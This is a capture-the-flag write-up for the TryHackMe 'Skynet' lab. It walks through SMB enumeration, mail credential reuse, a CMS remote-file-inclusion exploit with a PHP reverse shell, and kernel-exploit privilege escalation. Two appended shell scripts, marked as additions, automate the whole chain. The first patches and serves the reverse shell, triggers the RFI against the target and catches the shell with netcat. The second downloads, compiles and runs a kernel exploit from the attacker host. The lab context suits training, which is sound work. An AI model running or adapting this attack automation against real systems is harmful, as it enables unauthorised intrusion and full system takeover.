[Writeup] TryHackMe — Skynet — Another privesc approach

Luis Toro (aka @LobuhiSec)
4 min read · Aug 6, 2020


ROOM: https://tryhackme.com/room/skynet

Let me show you a different route from the official writeup, which you can find here: https://blog.tryhackme.com/skynet-writeup/.

First things first, let’s scan:

That looks like a lot of output, but what matters is that we have SSH, a web server, POP3, IMAP and Samba.

First change versus the official writeup: I’ll use dirsearch instead of gobuster:

We find a SquirrelMail login page, but we have no credentials yet:

Let’s go back and check SMB as an anonymous user:

Check the contents of the retrieved files:

Note that SMB also exposes a share called “milesdyson”, and the retrieved files give us a list of plausible passwords. Try them against SquirrelMail (the share name is the obvious username to pair them with) and you’ll soon find the right one.

In the SquirrelMail inbox you’ll find a juicy e-mail:

We’ll use this password to access the “milesdyson” share:

Here you’ll find a lot of PDFs and a directory called notes. That folder is also full of PDFs, but there is a plain-text file called important.txt; let’s grab it:

Now we have a new path to a CMS, one that a regular gobuster or dirsearch run would never discover, since the directory name is random rather than something from a wordlist:

Well, this doesn’t look like a regular CMS, and its page source doesn’t show anything interesting… Let’s run dirsearch against this path:

Hmm… an “administrator” directory… Now here’s the CMS:

We don’t even need to log in; let’s check exploit-db first:

A juicy RFI! Let’s see how it works at https://www.exploit-db.com/exploits/25971:

We’ll use pentestmonkey’s well-known PHP reverse shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Here’s the procedure:

1. Download the php-reverse-shell:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

2. Set your IP (the address the target can reach, i.e. your VPN address) with a text editor, or just:

sed -i 's/127.0.0.1/<your_ip>/g' php-reverse-shell.php

3. Serve the php-reverse-shell.php file; I use:

python -m SimpleHTTPServer 80

(On Python 3 the equivalent module is http.server.)

4. Keep a netcat listener on port 1234, the default in php-reverse-shell.php, unless you changed it:

nc -lvp 1234

5. Open a web browser and go to:

http://10.10.24.172/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php?

The trailing ? is deliberate: anything the vulnerable include appends after our URL lands in a harmless query string instead of breaking the path to the payload.

Et voilà! A reverse shell running as www-data. Now you can retrieve the user flag.
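The five steps above, wrapped into shell functions so they can be re-run against a fresh box. This is an added example, not code from the original writeup or from pentestmonkey: TARGET_IP and CMS_PATH are taken from the trigger URL above; ATTACKER_IP, LPORT, the python3 http.server replacement for SimpleHTTPServer and the curl-based trigger are assumptions for your own session.

```shell
#!/bin/sh
# Added example, not code from the original writeup or from pentestmonkey:
# the five RFI steps above as shell functions. TARGET_IP and CMS_PATH come from
# the trigger URL in the writeup; ATTACKER_IP and LPORT are assumptions that you
# set for your own session.
set -eu

TARGET_IP="10.10.24.172"
CMS_PATH="45kra24zxs28v3yd/administrator/alerts/alertConfigField.php"
ATTACKER_IP="${ATTACKER_IP:-10.9.0.1}"   # assumed VPN address; override via env
LPORT="${LPORT:-1234}"                   # php-reverse-shell's default port
SHELL_URL="https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"

# Step 2: patch the listener address and port inside a php-reverse-shell.php copy.
# pentestmonkey's file keeps them on lines of the form
#     $ip = '127.0.0.1';  // CHANGE THIS
#     $port = 1234;       // CHANGE THIS
# so the substitutions anchor on "= '127.0.0.1';" and "= 1234;" rather than on
# any 127.0.0.1 in the file. GNU sed syntax (Kali); BSD sed wants -i ''.
patch_reverse_shell() {
    file="$1"; ip="$2"; port="$3"
    sed -i \
        -e "s/= '127\.0\.0\.1';/= '${ip}';/" \
        -e "s/= 1234;/= ${port};/" \
        "$file"
}

# Step 5: build the trigger URL. The trailing '?' is kept from the writeup:
# whatever the vulnerable include appends after our URL becomes a query string
# to our server instead of corrupting the path to php-reverse-shell.php.
rfi_url() {
    printf 'http://%s/%s?urlConfig=http://%s/php-reverse-shell.php?\n' \
        "$TARGET_IP" "$CMS_PATH" "$1"
}

# Steps 1, 3, 4 and 5 end to end. Only runs when invoked as: sh rfi.sh run
run_attack() {
    [ -f php-reverse-shell.php ] || wget -q "$SHELL_URL"
    patch_reverse_shell php-reverse-shell.php "$ATTACKER_IP" "$LPORT"

    # Step 3: serve the payload (python3 http.server replaces SimpleHTTPServer).
    # Port 80 needs root, as in the writeup.
    python3 -m http.server 80 >/dev/null 2>&1 &
    httpd=$!

    # Step 5, delayed so the listener below is up before the include fires.
    # The HTTP request stays open while the PHP shell lives, hence a background job.
    ( sleep 2; curl -s "$(rfi_url "$ATTACKER_IP")" >/dev/null 2>&1 ) &
    trigger=$!

    # Step 4: catch the shell. Leaving nc (Ctrl-C) also cleans up the helpers.
    nc -lvnp "$LPORT" || true
    kill "$httpd" "$trigger" 2>/dev/null || true
}

if [ "${1:-}" = "run" ]; then
    run_attack
fi
```

Anchoring the sed on the `= '127.0.0.1';` and `= 1234;` fragments avoids the classic mistake of the global `127.0.0.1` replacement hitting some other literal in a payload, and keeping the URL in a function means the one place people typo (the extra `?`) is written once.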

Time to privesc. This is the part you won’t find in the official writeup, which uses a crontab-based approach; here we’ll use a kernel exploit instead. Bear in mind that a kernel exploit that doesn’t match the running kernel can crash the box rather than fail cleanly, so on a real engagement the crontab route is the safer one; in a lab it’s fine.

1. On your Kali machine, download linpeas.sh into the directory you’re serving with SimpleHTTPServer (~/thm/skynet in my case):

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

2. From the reverse shell, fetch the script:

wget http://<yourip>/linpeas.sh

3. Make it executable and run it:

chmod u+x linpeas.sh

./linpeas.sh

In the first few lines we already have a red indicator: the kernel version.

Let’s search exploit-db:

Fine, we have two verified exploits; we’ll try the most recent one:

1. From your Kali machine, download the raw exploit into the directory you’re serving with SimpleHTTPServer:

wget https://www.exploit-db.com/raw/43418

2. From the reverse shell, fetch the exploit:

wget http://<your_ip>/43418

3. Rename it (give it a .c extension), compile and run:
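A small gate around the rename/compile/run step, as an added example that is not part of the original writeup: it compares the running kernel with the upper bound an exploit advertises before building and firing it, since a mismatched kernel exploit usually panics the machine instead of failing. MAX_VULN (a placeholder bound), ATTACKER_IP and the plain gcc invocation are assumptions; take the real bound and any build flags from the header comment of the exploit you actually downloaded.

```shell
#!/bin/sh
# Added example, not code from the original writeup: a sanity gate around the
# "rename, compile and run" step. MAX_VULN, ATTACKER_IP and the gcc invocation
# are assumptions; read the exploit's header for the real bound and build flags.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.9.0.1}"
MAX_VULN="${MAX_VULN:-4.8.0-58}"   # assumed upper bound; check the exploit header

# Drop the flavour suffix ("4.8.0-58-generic" -> "4.8.0-58") so only numeric
# fields take part in the comparison.
kernel_base() {
    printf '%s\n' "$1" | sed 's/-[A-Za-z].*$//'
}

# version_lt A B: exit 0 if A is strictly lower than B, comparing field by field
# on '.' and '-' (so 4.4.0-116 < 4.8.0-58 and 4.13.9 > 4.8.0-58). Missing fields
# count as 0; equal versions are not "lower".
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, /[.-]/); m = split(b, y, /[.-]/)
        len = (n > m) ? n : m
        for (i = 1; i <= len; i++) {
            xi = (i <= n) ? x[i] + 0 : 0
            yi = (i <= m) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# run_kernel_exploit ID: steps 2 and 3 above for exploit-db entry ID (43418 in
# the writeup), fetched from the attacker's web server and run only when the
# kernel is inside the vulnerable range.
run_kernel_exploit() {
    id="$1"
    running=$(kernel_base "$(uname -r)")
    if ! version_lt "$running" "$MAX_VULN"; then
        echo "kernel $running is not below $MAX_VULN; not running exploit $id" >&2
        return 1
    fi
    wget -q "http://${ATTACKER_IP}/${id}" -O "${id}.c"    # rename on download
    gcc "${id}.c" -o "${id}"                              # flags: see exploit header
    "./${id}"
}

if [ "${1:-}" = "run" ]; then
    run_kernel_exploit "${2:-43418}"
fi
```

Run it from the reverse shell as `sh gate.sh run 43418`; the refusal path is the point, since linpeas only tells you the kernel looks old, not that this particular exploit’s range covers it.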

Enjoy!
